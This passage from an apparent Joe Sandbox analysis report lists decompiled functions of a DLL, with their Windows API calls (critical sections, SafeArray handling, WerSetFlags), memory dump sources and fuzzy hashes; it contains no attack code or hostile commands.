                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: c1083f5d0d736172463e93a1da907a0830c26340a51474c2866543d5957ed376
                                                                                                          • Instruction ID: 041cbee2ea5260baf3a7877a4336b0475a5856061929b2d9c027cb7b21ce3914
                                                                                                          • Opcode Fuzzy Hash: c1083f5d0d736172463e93a1da907a0830c26340a51474c2866543d5957ed376
                                                                                                          • Instruction Fuzzy Hash: 04315C715097059FCB04DF28C580A9AB7F5FF89714F508A6EF8558B390E731E906CB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F039110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6F03913B
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6F03915C
                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6F039170
                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6F039191
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3168844106-0
                                                                                                          • Opcode ID: db5c18efb2bec3a057b46b8235c933aba8057fb790b449f099a2b23a4766ec54
                                                                                                          • Instruction ID: 68e53cc46f91f4b29cf3d7d75c96dd78001c629ff95c69fee19976b736d5974c
                                                                                                          • Opcode Fuzzy Hash: db5c18efb2bec3a057b46b8235c933aba8057fb790b449f099a2b23a4766ec54
                                                                                                          • Instruction Fuzzy Hash: A3417F76D0021ADFCB04DF99C9849EEBBF5FF88310B11855ED816AB240DB30AA15CFA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F038E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6F038E89
                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 6F038EAD
                                                                                                          • _memset.LIBCMT ref: 6F038ED2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3751686142-0
                                                                                                          • Opcode ID: 85a0e14661de3a06900980bdaea9cf41faa0097c96ac2247c1b98e1f08dcb191
                                                                                                          • Instruction ID: d8fbed6d688a2c7a4bd76742285f80d2903c07b9e974db5ec7c09fc3dae6a86b
                                                                                                          • Opcode Fuzzy Hash: 85a0e14661de3a06900980bdaea9cf41faa0097c96ac2247c1b98e1f08dcb191
                                                                                                          • Instruction Fuzzy Hash: CE516EB6A04216EFCB04CF58C990F9AB7F6FF49304F108599E91A9B381D731E955CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F043A90 Relevance: 4.6, APIs: 3, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F043B71
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F043B83
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F043BCF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$Destroy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3651546500-0
                                                                                                          • Opcode ID: 307922e4f810401b83c9c299b2c58dacf3a4153a536d1ba10b86285566a8d85f
                                                                                                          • Instruction ID: 790b820c75e93c61c7941d77398cf18f44e1d42d98f3ffba02991d1a98f39339
                                                                                                          • Opcode Fuzzy Hash: 307922e4f810401b83c9c299b2c58dacf3a4153a536d1ba10b86285566a8d85f
                                                                                                          • Instruction Fuzzy Hash: BB41AB71208A01DFC701CF18C881F5AF7E9FFC9254F205A2EF9A497690E630E8469B92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0469C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F046A08
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F046A15
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F046A41
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$Element
                                                                                                          • String ID:
                                                                                                          • API String ID: 3836540358-0
                                                                                                          • Opcode ID: 479ee2b3512f862295eb7a67c7b63de58cda5a9134a4a4c93bfe8be5ba0c3299
                                                                                                          • Instruction ID: ebaa512f10dccd610e5d7b1802036d0ec1fbaf2605d85a5c3fe7127fa2b9bc63
                                                                                                          • Opcode Fuzzy Hash: 479ee2b3512f862295eb7a67c7b63de58cda5a9134a4a4c93bfe8be5ba0c3299
                                                                                                          • Instruction Fuzzy Hash: B3411D75600619DFDB00DF64C984FDFB7B9EF4A350F108669E9119B290E731E951CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03DFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F03DFF6
                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F03E003
                                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F03E02F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Bound$Element
                                                                                                          • String ID:
                                                                                                          • API String ID: 3836540358-0
                                                                                                          • Opcode ID: d02c215260e88685c9d201fc1c098445032d758bd177346f1290f85c663fd99e
                                                                                                          • Instruction ID: 17f2eed52315ce76ef31d40df427f09b6017694489f74453986c70516cfac37b
                                                                                                          • Opcode Fuzzy Hash: d02c215260e88685c9d201fc1c098445032d758bd177346f1290f85c663fd99e
                                                                                                          • Instruction Fuzzy Hash: 90410C76A0061ADFCB14DFA8CCC4AAEB7B9FF49310B204669E525E7390D731AD46CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03D920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6F03D949
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6F03D96C
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F03D9CF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 3149346722-0
                                                                                                          • Opcode ID: 8a6ff568db0f46653d485f7ca70d5258adee3e217f927e65626f3bffb24c98ac
                                                                                                          • Instruction ID: 1137b885d23b386cbf61e1096e0f03d6118fcd0a9ecd0c3fcb72c0db5c138540
                                                                                                          • Opcode Fuzzy Hash: 8a6ff568db0f46653d485f7ca70d5258adee3e217f927e65626f3bffb24c98ac
                                                                                                          • Instruction Fuzzy Hash: A1219236A01619EFEB11CF54C884FAB77E9EF8A710F10405AED44DB248D771E901DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F04DB2D
                                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F04DB45
                                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F04DBA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 3149346722-0
                                                                                                          • Opcode ID: 34ac8da219f1fb483046366c4b41688f9f5c727d2f4e422771d396a7679344c3
                                                                                                          • Instruction ID: 40cfa470385b43a6db92fca050930c33d5fa0141194ddd07780561f3e87ebc8b
                                                                                                          • Opcode Fuzzy Hash: 34ac8da219f1fb483046366c4b41688f9f5c727d2f4e422771d396a7679344c3
                                                                                                          • Instruction Fuzzy Hash: 70116D79642205EFD700DF69C888F9ABBB8FF5A310F0481A9E918DB341D731A911CBE0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03BDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F03BE2D
                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6F03BE6D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroyReadSafe
                                                                                                          • String ID:
                                                                                                          • API String ID: 616443815-0
                                                                                                          • Opcode ID: 415e341ae4f0e7b6834c9f3c9ba940cb6d7aa6b68132a04f1ab6e9e2fcf36fba
                                                                                                          • Instruction ID: 2b9704a2b5736f77b1bf80f0c2dc650c808675a5f526203c478f4481b0487ea4
                                                                                                          • Opcode Fuzzy Hash: 415e341ae4f0e7b6834c9f3c9ba940cb6d7aa6b68132a04f1ab6e9e2fcf36fba
                                                                                                          • Instruction Fuzzy Hash: 1571A2F2E04AA75EDB118E7888407A9FBF2AF46228F14835DD9E59B2D5C731E442CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F046FD0 Relevance: 2.9, APIs: 1, Instructions: 1419COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WerSetFlags.KERNEL32 ref: 6F04714E
                                                                                                            • Part of subcall function 6F03D9F0: SafeArrayCreateVector.OLEAUT32(0000000D,00000000,?), ref: 6F03DA16
                                                                                                            • Part of subcall function 6F03D9F0: SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6F03DA33
                                                                                                            • Part of subcall function 6F03D9F0: SafeArrayDestroy.OLEAUT32(00000000), ref: 6F03DA9E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$CreateDestroyElementFlagsVector
                                                                                                          • String ID:
                                                                                                          • API String ID: 2745967588-0
                                                                                                          • Opcode ID: 991763172f63cd22e488a15a1d6ae7f15cc85f27a45c34c87272ce420f225115
                                                                                                          • Instruction ID: 0906e9ec53b136f45bedb52eaa11f95f899c357d750c181f7a4874756d71d283
                                                                                                          • Opcode Fuzzy Hash: 991763172f63cd22e488a15a1d6ae7f15cc85f27a45c34c87272ce420f225115
                                                                                                          • Instruction Fuzzy Hash: 36C22975A01701EFDB00CF64CA80BE977A9AF4A318F1545A4ED54BB386DB75F842CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F038D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,6F038C13,?,6F038CD3,?,6F038C13,00000000,?,?,6F038C13,?,?), ref: 6F038D73
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,6F038CD3,?,6F038C13,00000000,?,?,6F038C13,?,?), ref: 6F038D8C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3168844106-0
                                                                                                          • Opcode ID: 6d3386a64c8011d611c2fefe07066d10f098bfe87f9531878e72757acc772b3a
                                                                                                          • Instruction ID: 5307ab44022f4ee2213c04d00757fd059b0d6ebd06b28de1fa042f85f7dce53b
                                                                                                          • Opcode Fuzzy Hash: 6d3386a64c8011d611c2fefe07066d10f098bfe87f9531878e72757acc772b3a
                                                                                                          • Instruction Fuzzy Hash: 3021E97660450AEFCB04DF49D890DAAB3FAFFC9210B108549E90587351CB71EE15DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F038BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,6F036890,?), ref: 6F038BDD
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6F038C23
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3168844106-0
                                                                                                          • Opcode ID: 3649d61700e797f023d87c298868c2b4ab2c85a5e7697b108d3d53734d621b76
                                                                                                          • Instruction ID: 136d4393f5a3959f1eb096099b8ca2c50a7c8aba87e1825a01b3b7d46a61f02f
                                                                                                          • Opcode Fuzzy Hash: 3649d61700e797f023d87c298868c2b4ab2c85a5e7697b108d3d53734d621b76
